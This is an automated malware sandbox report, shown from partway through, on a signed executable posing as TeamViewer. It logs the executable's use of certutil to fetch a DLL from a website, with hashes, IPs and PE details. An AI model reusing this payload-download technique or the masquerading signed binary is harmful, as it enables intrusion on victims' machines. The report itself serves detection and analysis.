http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://www.christchurchmvl.org/volunteer/actXApiLib.dllC:0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
christchurchmvl.org
100.26.95.170
truetrueunknown
www.christchurchmvl.org
unknown
unknowntrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://www.christchurchmvl.org/volunteer/actXApiLib.dlltrue
  • 11%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#cBQPecnQRp.exefalse
  • URL Reputation: safe
unknown
https://sectigo.com/CPS0cBQPecnQRp.exefalse
  • URL Reputation: safe
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#cBQPecnQRp.exefalse
  • URL Reputation: safe
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ycBQPecnQRp.exefalse
  • URL Reputation: safe
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0cBQPecnQRp.exefalse
  • URL Reputation: safe
unknown
http://ocsp.sectigo.com0cBQPecnQRp.exefalse
  • URL Reputation: safe
unknown
https://www.christchurchmvl.org/volunteer/actXApiLib.dllC:certutil.exe, 0000000A.00000002.777469638.0000000000930000.00000004.00000040.sdmptrue
  • Avira URL Cloud: safe
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
100.26.95.170
christchurchmvl.orgUnited States
14618AMAZON-AESUStrue

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:483791
Start date:15.09.2021
Start time:13:45:42
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 38s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:cBQPecnQRp (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:20
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal72.evad.winEXE@8/1@2/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
  • Excluded IPs from analysis (whitelisted): 20.49.157.6, 92.122.145.220, 20.82.210.154, 23.55.161.168, 23.55.161.155, 23.55.161.144, 23.55.161.165, 23.55.161.159, 23.55.161.148, 23.55.161.164, 23.55.161.163, 23.55.161.162, 20.54.110.249, 40.112.88.60, 23.216.77.208, 23.216.77.209
  • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

TimeTypeDescription
13:47:28API Interceptor1x Sleep call for process: certutil.exe modified

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
100.26.95.170http://ashevilleurological.com/library/photos/medium/index.htmlGet hashmaliciousBrowse
  • ashevilleurological.com/library/photos/medium/favicon.ico

Domains

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
AMAZON-AESUS1If1ISJz9D.exeGet hashmaliciousBrowse
  • 100.26.95.170
Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeGet hashmaliciousBrowse
  • 52.71.133.130
PO7420.exeGet hashmaliciousBrowse
  • 52.4.209.250
DLH1TwLBhW.exeGet hashmaliciousBrowse
  • 50.16.244.183
avxeC9WssiGet hashmaliciousBrowse
  • 54.57.110.152
Quotation urgent.exeGet hashmaliciousBrowse
  • 52.201.24.227
KOC RFQ.docGet hashmaliciousBrowse
  • 52.204.77.43
PO. 2100002_pdf____________________________________.exeGet hashmaliciousBrowse
  • 3.223.115.185
hhh.mp3.dllGet hashmaliciousBrowse
  • 54.243.45.255
xrm4z50ja9.exeGet hashmaliciousBrowse
  • 54.83.52.76
Swift Trf.exeGet hashmaliciousBrowse
  • 52.201.24.227
HjIXsbs4JgGet hashmaliciousBrowse
  • 54.142.124.216
7b388AC1FwGet hashmaliciousBrowse
  • 44.194.145.151
DPD.apkGet hashmaliciousBrowse
  • 50.16.244.183
Po2142021.xlsxGet hashmaliciousBrowse
  • 18.213.250.117
FlashPlayerUpdate.apkGet hashmaliciousBrowse
  • 23.21.76.7
QcXQmNSaSpGet hashmaliciousBrowse
  • 18.207.108.88
i586Get hashmaliciousBrowse
  • 34.231.175.5
armGet hashmaliciousBrowse
  • 54.133.131.54
zoD4YzpMMGGet hashmaliciousBrowse
  • 54.80.227.212

JA3 Fingerprints

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
ce5f3254611a8c095a3d821d445398771If1ISJz9D.exeGet hashmaliciousBrowse
  • 100.26.95.170
FjtSz0VShQ.exeGet hashmaliciousBrowse
  • 100.26.95.170
DlZa7n6PjI.exeGet hashmaliciousBrowse
  • 100.26.95.170
L5q2UZAWzY.exeGet hashmaliciousBrowse
  • 100.26.95.170
SecuriteInfo.com.Trojan.DownLoader43.21162.28718.exeGet hashmaliciousBrowse
  • 100.26.95.170
N3sJiiIQAP.exeGet hashmaliciousBrowse
  • 100.26.95.170
hu5De62I6f.exeGet hashmaliciousBrowse
  • 100.26.95.170
cwCpwXnpg4.exeGet hashmaliciousBrowse
  • 100.26.95.170
SacEedFBvw.exeGet hashmaliciousBrowse
  • 100.26.95.170
z5k6kTAFkF.exeGet hashmaliciousBrowse
  • 100.26.95.170
cGJCfDNHnZ.exeGet hashmaliciousBrowse
  • 100.26.95.170
GCw589FSm7.exeGet hashmaliciousBrowse
  • 100.26.95.170
67d16a17f27f15cf21671ccb406e1e8b647aaf90c72c9.exeGet hashmaliciousBrowse
  • 100.26.95.170
vPzJQvH6Pg.exeGet hashmaliciousBrowse
  • 100.26.95.170
9f60a157b1a91cc18125825a286baaf011e65b0808be4.exeGet hashmaliciousBrowse
  • 100.26.95.170
P8zmYu7q7j.exeGet hashmaliciousBrowse
  • 100.26.95.170
P8zmYu7q7j.exeGet hashmaliciousBrowse
  • 100.26.95.170
Wyb6Tqwcqx.exeGet hashmaliciousBrowse
  • 100.26.95.170
8mFCVBuwst.exeGet hashmaliciousBrowse
  • 100.26.95.170
75114eeae6429f297193678413f5523eea5e25474745d.exeGet hashmaliciousBrowse
  • 100.26.95.170
37f463bf4616ecd445d4a1937da06e191If1ISJz9D.exeGet hashmaliciousBrowse
  • 100.26.95.170
26pBOwgewg.exeGet hashmaliciousBrowse
  • 100.26.95.170
lMESQl89na.exeGet hashmaliciousBrowse
  • 100.26.95.170
JHHPuXppBJ.exeGet hashmaliciousBrowse
  • 100.26.95.170
kpbNbKpJfr.dllGet hashmaliciousBrowse
  • 100.26.95.170
mfQoul1M1Q.exeGet hashmaliciousBrowse
  • 100.26.95.170
k4fNN2WDpY.dllGet hashmaliciousBrowse
  • 100.26.95.170
SecuriteInfo.com.__vbaHresultCheckObj.22789.exeGet hashmaliciousBrowse
  • 100.26.95.170
w9CH3AAVOp.exeGet hashmaliciousBrowse
  • 100.26.95.170
Halkbank02.exeGet hashmaliciousBrowse
  • 100.26.95.170
DlZa7n6PjI.exeGet hashmaliciousBrowse
  • 100.26.95.170
7Tat85Af0C.exeGet hashmaliciousBrowse
  • 100.26.95.170
86jLEXtwqR.exeGet hashmaliciousBrowse
  • 100.26.95.170
6WtKevhqlg.exeGet hashmaliciousBrowse
  • 100.26.95.170
oLn3NAKPzu.exeGet hashmaliciousBrowse
  • 100.26.95.170
hd9uHo4dot.exeGet hashmaliciousBrowse
  • 100.26.95.170
47U9eIz5bG.exeGet hashmaliciousBrowse
  • 100.26.95.170
FaxGUO65DE.391343-Faa.htmlGet hashmaliciousBrowse
  • 100.26.95.170
FaxGUO65DE.391343-Faa.htmlGet hashmaliciousBrowse
  • 100.26.95.170
x13NYP60fd.exeGet hashmaliciousBrowse
  • 100.26.95.170

Dropped Files

No context

Created / dropped Files

C:\ProgramData\actXApiLib.dll
Process:C:\Windows\SysWOW64\certutil.exe
File Type:HTML document, ASCII text
Category:dropped
Size (bytes):196
Entropy (8bit):5.098952451791238
Encrypted:false
SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezocKqD:J0+oxBeRmR9etdzRxGez1T
MD5:62962DAA1B19BBCC2DB10B7BFD531EA6
SHA1:D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
SHA-256:80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
SHA-512:9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
Malicious:true
Reputation:low
Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.445333009028377
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:cBQPecnQRp.exe
File size:1363448
MD5:53817315b195e328ccc0f56b15b247c7
SHA1:7bedab96b89d000288b573de0b5693cf49dae47f
SHA256:ea2decec34ae3129d5da1f2035b34cff3c9f656bb4423904ef6b0a3ca5f47d5e
SHA512:2ca834743045f742bc65da90f1b0868af54f7d703c0ef11b6deac4080bb7260ad2f9d5d0bb7b5e2a2eca5ef837c6ad976234594e931c6fbfce06c8e1d4cb1512
SSDEEP:24576:NVPOpKJdaWTVE6LwF5oSZc1HHZZZ6OEtdU:mId1+6cjoSMHHZZZ6OEtd
File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......s..r7..!7..!7..!l.. !..!l.. ...!... &..!... /..!... 1..!... ...!l.. ...!l.. 4..!... ...!7..!`..!mK1!?..!7..!...!... a..!...!6..

File Icon

Icon Hash:78706a6ab8a180c0

Static PE Info

General

Entrypoint:0x44f6f0
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:GUARD_CF, TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:0x5FD76A63 [Mon Dec 14 13:36:35 2020 UTC]
TLS Callbacks:0x494680, 0x494e50, 0x494eb0
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:b5f0210fb8fa3412ad980dc8b3f3cd95

Authenticode Signature

Signature Valid:true
Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:The operation completed successfully
Error Number:0
Not Before, Not After
  • 6/4/2021 2:00:00 AM 6/5/2022 1:59:59 AM
Subject Chain
  • CN=Hartex LLC, O=Hartex LLC, L=Moscow, C=RU
Version:3
Thumbprint MD5:5D5CA7E8D78224799E8AA101FF486137
Thumbprint SHA-1:319517761E92EC6EEF1966A5994570D46A498093
Thumbprint SHA-256:AC50A5D91A71BA8447EE795FF966E625AEC004E49EB24ADAA366B988686B65A5
Serial:009B576882CCDB891FD6E4A66671F3AC71

Entrypoint Preview

Instruction
call 00007FA0C4A06EA8h
jmp 00007FA0C4A064BDh
push ebp
mov ebp, esp
pop ebp
jmp 00007FA0C4A05F16h
jmp 00007FA0C4A05EEDh
int3
int3
int3
int3
int3
int3
int3
int3
push ecx
lea ecx, dword ptr [esp+08h]
sub ecx, eax
and ecx, 0Fh
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp 00007FA0C4A06F8Fh
push ecx
lea ecx, dword ptr [esp+08h]
sub ecx, eax
and ecx, 07h
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp 00007FA0C4A06F79h
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007FA0C4A05E9Fh
jmp 00007FA0C4A06620h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [004F4024h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [004F4024h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0xf2f440x28.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0xfe0000x47b40.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x14a8000x25f8.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC0x1460000xa23c.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0xe2c100x54.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0xe2c640x18.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xbe8d80x40.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0xb90000x24c.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xf25980x160.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000xb718a0xb7200False0.495668462031data6.785949083IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0xb90000x3acc00x3ae00False0.322618099788COM executable for DOS6.31638797155IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0xf40000x8ac80x6200False0.153698979592data4.61512382052IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.didat0xfd0000x1640x200False0.41015625data3.13519516789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc0xfe0000x47b400x47c00False0.076784353223data3.18159027325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x1460000xa23c0xa400False0.605182926829data6.59143707944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
RT_BITMAP0xfe3b80x1568dataGermanGermany
RT_BITMAP0xff9200x1d8dataGermanGermany
RT_ICON0xffe280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
RT_ICON0x1002900x10a8dataEnglishUnited States
RT_ICON0x1013380x25a8dataEnglishUnited States
RT_ICON0x1038e00x42028dataEnglishUnited States
RT_DIALOG0xfe3100xa4dataGermanGermany
RT_STRING0x1459580x62dataEnglishUnited States
RT_ACCELERATOR0x1459480x10dataEnglishUnited States
RT_GROUP_ICON0x1459080x3edataEnglishUnited States
RT_VERSION0xffaf80x32cdataGermanGermany
RT_MANIFEST0x1459c00x17dXML 1.0 document textEnglishUnited States

Imports

DLLImport
KERNEL32.dllLoadLibraryExA, GetModuleHandleA, GetModuleFileNameA, GetSystemDirectoryA, GetModuleFileNameW, SetLastError, EnterCriticalSection, LeaveCriticalSection, GetCurrentThreadId, RaiseException, DeleteCriticalSection, GetLastError, InitializeCriticalSectionEx, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, DecodePointer, GetProcAddress, FreeLibrary, VerSetConditionMask, VerifyVersionInfoW, IsWow64Process, GetCurrentProcess, SetSearchPathMode, SetDllDirectoryW, HeapSetInformation, SetProcessDEPPolicy, GetSystemDirectoryW, LoadLibraryExW, LoadLibraryW, GetFileAttributesW, CreateFileW, CloseHandle, WideCharToMultiByte, LocalFree, FormatMessageW, FormatMessageA, CreateTimerQueue, GetSystemInfo, VirtualProtect, VirtualQuery, GetModuleHandleW, MultiByteToWideChar, GetStringTypeW, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, EncodePointer, LCMapStringW, GetLocaleInfoW, GetCPInfo, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, IsDebuggerPresent, OutputDebugStringW, SetEvent, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, RtlUnwind, InterlockedFlushSList, ExitProcess, GetModuleHandleExW, GetStdHandle, WriteFile, GetCurrentThread, GetFileType, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, TerminateThread, QueueUserAPC, CreateEventA, CreateDirectoryW, InitializeCriticalSection, ReleaseMutex, CreateMutexW, OpenMutexW, GetFileSize, OpenEventA, UnregisterWaitEx, Sleep, RegisterWaitForSingleObject, GetLocalTime, DuplicateHandle, ReleaseSemaphore, SetThreadPriority, QueryPerformanceFrequency, GetThreadTimes, TryEnterCriticalSection, GetLogicalProcessorInformation, CreateThread, FreeLibraryAndExitThread, SignalObjectAndWait, GetThreadPriority, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, UnregisterWait, GetVersionExW, QueryDepthSList

Version Infos

DescriptionData
LegalCopyrightTeamViewer Germany GmbH
InternalNameTeamViewer
FileVersion15.13.6.0
CompanyNameTeamViewer Germany GmbH
LegalTrademarksTeamViewer
ProductNameTeamViewer
ProductVersion15.13.6.0
FileDescriptionTeamViewer
OriginalFilenameTeamViewer_Note.exe
Translation0x0409 0x04b0

Possible Origin

Language of compilation systemCountry where language is spokenMap
GermanGermany
EnglishUnited States

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Sep 15, 2021 13:47:27.926995993 CEST49772443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:27.927061081 CEST44349772100.26.95.170192.168.2.4
Sep 15, 2021 13:47:27.927170992 CEST49772443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:27.931725025 CEST49772443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:27.931766033 CEST44349772100.26.95.170192.168.2.4
Sep 15, 2021 13:47:28.359617949 CEST44349772100.26.95.170192.168.2.4
Sep 15, 2021 13:47:28.359714031 CEST49772443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:28.408446074 CEST49772443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:28.408477068 CEST44349772100.26.95.170192.168.2.4
Sep 15, 2021 13:47:28.408838034 CEST44349772100.26.95.170192.168.2.4
Sep 15, 2021 13:47:28.473718882 CEST49772443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:29.485140085 CEST49772443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:29.527137995 CEST44349772100.26.95.170192.168.2.4
Sep 15, 2021 13:47:29.625088930 CEST44349772100.26.95.170192.168.2.4
Sep 15, 2021 13:47:29.641112089 CEST49772443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:30.275280952 CEST49773443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:30.275331020 CEST44349773100.26.95.170192.168.2.4
Sep 15, 2021 13:47:30.275847912 CEST49773443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:30.276878119 CEST49773443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:30.276904106 CEST44349773100.26.95.170192.168.2.4
Sep 15, 2021 13:47:30.557873964 CEST44349773100.26.95.170192.168.2.4
Sep 15, 2021 13:47:30.558068991 CEST49773443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:31.136315107 CEST49773443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:31.136341095 CEST44349773100.26.95.170192.168.2.4
Sep 15, 2021 13:47:31.136692047 CEST44349773100.26.95.170192.168.2.4
Sep 15, 2021 13:47:31.136763096 CEST49773443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:31.137299061 CEST49773443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:31.179140091 CEST44349773100.26.95.170192.168.2.4
Sep 15, 2021 13:47:31.276369095 CEST44349773100.26.95.170192.168.2.4
Sep 15, 2021 13:47:31.276463985 CEST49773443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:31.276484013 CEST44349773100.26.95.170192.168.2.4
Sep 15, 2021 13:47:31.276531935 CEST49773443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:31.291244984 CEST49773443192.168.2.4100.26.95.170
Sep 15, 2021 13:47:31.291408062 CEST44349773100.26.95.170192.168.2.4
Sep 15, 2021 13:47:31.291496038 CEST49773443192.168.2.4100.26.95.170

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Sep 15, 2021 13:46:34.089144945 CEST5585453192.168.2.48.8.8.8
Sep 15, 2021 13:46:34.133929968 CEST53558548.8.8.8192.168.2.4
Sep 15, 2021 13:46:36.824444056 CEST6454953192.168.2.48.8.8.8
Sep 15, 2021 13:46:36.863562107 CEST53645498.8.8.8192.168.2.4
Sep 15, 2021 13:47:10.051311970 CEST6315353192.168.2.48.8.8.8
Sep 15, 2021 13:47:10.079045057 CEST53631538.8.8.8192.168.2.4
Sep 15, 2021 13:47:25.735857010 CEST5299153192.168.2.48.8.8.8
Sep 15, 2021 13:47:25.764188051 CEST53529918.8.8.8192.168.2.4
Sep 15, 2021 13:47:27.737127066 CEST5370053192.168.2.48.8.8.8
Sep 15, 2021 13:47:27.914834023 CEST53537008.8.8.8192.168.2.4
Sep 15, 2021 13:47:30.207760096 CEST5172653192.168.2.48.8.8.8
Sep 15, 2021 13:47:30.271061897 CEST53517268.8.8.8192.168.2.4
Sep 15, 2021 13:47:31.987982035 CEST5679453192.168.2.48.8.8.8
Sep 15, 2021 13:47:32.026420116 CEST53567948.8.8.8192.168.2.4
Sep 15, 2021 13:47:32.757365942 CEST5653453192.168.2.48.8.8.8
Sep 15, 2021 13:47:32.811314106 CEST53565348.8.8.8192.168.2.4
Sep 15, 2021 13:47:33.307559967 CEST5662753192.168.2.48.8.8.8
Sep 15, 2021 13:47:33.334069014 CEST53566278.8.8.8192.168.2.4
Sep 15, 2021 13:47:33.695559978 CEST5662153192.168.2.48.8.8.8
Sep 15, 2021 13:47:33.698770046 CEST6311653192.168.2.48.8.8.8
Sep 15, 2021 13:47:33.735899925 CEST53566218.8.8.8192.168.2.4
Sep 15, 2021 13:47:33.754201889 CEST53631168.8.8.8192.168.2.4
Sep 15, 2021 13:47:34.294879913 CEST6407853192.168.2.48.8.8.8
Sep 15, 2021 13:47:34.367065907 CEST53640788.8.8.8192.168.2.4
Sep 15, 2021 13:47:35.136635065 CEST6480153192.168.2.48.8.8.8
Sep 15, 2021 13:47:35.165318966 CEST53648018.8.8.8192.168.2.4
Sep 15, 2021 13:47:35.826641083 CEST6172153192.168.2.48.8.8.8
Sep 15, 2021 13:47:35.885911942 CEST53617218.8.8.8192.168.2.4
Sep 15, 2021 13:47:36.763900995 CEST5125553192.168.2.48.8.8.8
Sep 15, 2021 13:47:36.793672085 CEST53512558.8.8.8192.168.2.4
Sep 15, 2021 13:47:37.570334911 CEST6152253192.168.2.48.8.8.8
Sep 15, 2021 13:47:37.610944033 CEST53615228.8.8.8192.168.2.4
Sep 15, 2021 13:47:38.181309938 CEST5233753192.168.2.48.8.8.8
Sep 15, 2021 13:47:38.214015007 CEST53523378.8.8.8192.168.2.4
Sep 15, 2021 13:47:49.626492977 CEST5504653192.168.2.48.8.8.8
Sep 15, 2021 13:47:49.663325071 CEST53550468.8.8.8192.168.2.4
Sep 15, 2021 13:48:23.738024950 CEST4961253192.168.2.48.8.8.8
Sep 15, 2021 13:48:23.775444031 CEST53496128.8.8.8192.168.2.4
Sep 15, 2021 13:48:25.384879112 CEST4928553192.168.2.48.8.8.8
Sep 15, 2021 13:48:25.411534071 CEST53492858.8.8.8192.168.2.4

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Sep 15, 2021 13:47:27.737127066 CEST192.168.2.48.8.8.80xbe2eStandard query (0)www.christchurchmvl.orgA (IP address)IN (0x0001)
Sep 15, 2021 13:47:30.207760096 CEST192.168.2.48.8.8.80xefdfStandard query (0)www.christchurchmvl.orgA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
Sep 15, 2021 13:47:27.914834023 CEST8.8.8.8192.168.2.40xbe2eNo error (0)www.christchurchmvl.orgchristchurchmvl.orgCNAME (Canonical name)IN (0x0001)
Sep 15, 2021 13:47:27.914834023 CEST8.8.8.8192.168.2.40xbe2eNo error (0)christchurchmvl.org100.26.95.170A (IP address)IN (0x0001)
Sep 15, 2021 13:47:30.271061897 CEST8.8.8.8192.168.2.40xefdfNo error (0)www.christchurchmvl.orgchristchurchmvl.orgCNAME (Canonical name)IN (0x0001)
Sep 15, 2021 13:47:30.271061897 CEST8.8.8.8192.168.2.40xefdfNo error (0)christchurchmvl.org100.26.95.170A (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • www.christchurchmvl.org

HTTPS Proxied Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.2.449772100.26.95.170443C:\Windows\SysWOW64\certutil.exe
TimestampkBytes transferredDirectionData
2021-09-15 11:47:29 UTC0OUTGET /volunteer/actXApiLib.dll HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: www.christchurchmvl.org
2021-09-15 11:47:29 UTC0INHTTP/1.1 404 Not Found
Date: Wed, 15 Sep 2021 11:47:29 GMT
Server: Apache
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
